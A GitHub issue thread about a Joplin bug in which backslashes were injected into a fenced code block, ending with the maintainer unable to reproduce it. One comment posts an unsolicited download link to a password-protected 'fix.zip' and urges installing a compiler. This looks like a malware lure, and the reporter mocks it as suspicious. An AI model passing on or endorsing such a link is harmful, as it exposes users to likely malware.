### ISSUE TITLE
This test document is breaking joplin. Has something to do with the "Fenced code block" section.

### ISSUE THREAD

**Issue by futuremotiondev** [laurent22/joplin#11154] opened 2024-09-29 03:19 UTC
### Operating system

Windows

### Joplin version

3.1.17

### Desktop version info

Joplin 3.1.17 (prod, win32)

Client ID: 470c00f76de6488a98fd6a25df21fcda
Sync Version: 3
Profile Version: 47
Keychain Supported: Yes

Revision: 3ea403d

Backup: 1.4.2
Csv Import: 1.0.1
Favorites: 1.3.2
Headings 4 to 6: 1.0.1
Insert Date: 1.0.1
Paste Special: 1.1.2
Table Formatter Plugin: 1.2.1

### Current behaviour

1. Open this test jex document in Joplin: [MD Test Document.zip](https://github.com/user-attachments/files/17177387/MD.Test.Document.zip)
2. If Joplin doesn't go completely unresponsive, check the markdown source and look at the `<pre>` tag directly under the `"Fenced" code block` H3 heading.
3. See that Joplin injected a ton of backslashes followed by a final back-tick.
4. The original markdown source was this: https://gist.github.com/jonschlinkert/5854601#fenced-code-block

### Expected behaviour

I expected Joplin to not insert massive amounts of backslashes into the document, even if the markdown was malformed.

I really do not know if what I supplied is sufficient to replicate the issue as I'm not sure when the corruption actually happened. But I suspect some kind of character escaping logic with code blocks isn't working right. It's also possible that an older version of the app broke the document and the bug no longer exists. I felt like reporting the issue anyway would be best as it might lead to some kind of bug fix.

**Comment by SagarChandra07** [comment] 2024-09-29 03:20
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by futuremotiondev** [comment] 2024-09-29 05:28
... that's not suspicious at all

**Comment by pedr** [comment] 2024-12-13 15:05
When I imported your .jex file, the editor slowed down, probably because of the number of backslashes, but I can't find a reason or how to reproduce it for now.

I tried to reproduce the bug by:

- Copying the raw content from the gist to the markdown editor, changing between editors to see if it would make the backslashes appear
- Copied the HTML content from the gist and pasted on on Rich Text Editor and got this [1], which I think it is what we expected

[1] 
![image](https://github.com/user-attachments/assets/4595ce8a-f882-4f6f-8316-98ff99145a19)

**Comment by pedr** [comment] 2024-12-16 14:33
@futuremotiondev I tried to reproduce it and couldn't do it. How did you create the note? Can you give me more detailed steps?

**Comment by pedr** [comment] 2024-12-23 15:53
Moving to backlog for now as I could not reproduce, if the author could provide more information on how to reproduce I can work on this again.

**Closed as not planned by pedr** 2024-12-23 15:53 UTC
Labels: bug, desktop, backlog

**Comment by futuremotiondev** [comment] 2024-12-24 18:45
> @futuremotiondev I tried to reproduce it and couldn't do it. How did you create the note? Can you give me more detailed steps?

Yeah, I'm really sorry I can't provide more information. I know that the note initially did not have all of the backslashes, but I have no clue when and how the corruption occurred. I thought it might have had something to do with escape sequence parsing in `html` designated code blocks but I'm only just speculating.

The bug could have already been fixed as well. Either way I've had no similar problems since, so I don't think it's a big issue. If I run into it again and find an exact way to reproduce it I'll make a new issue about it.
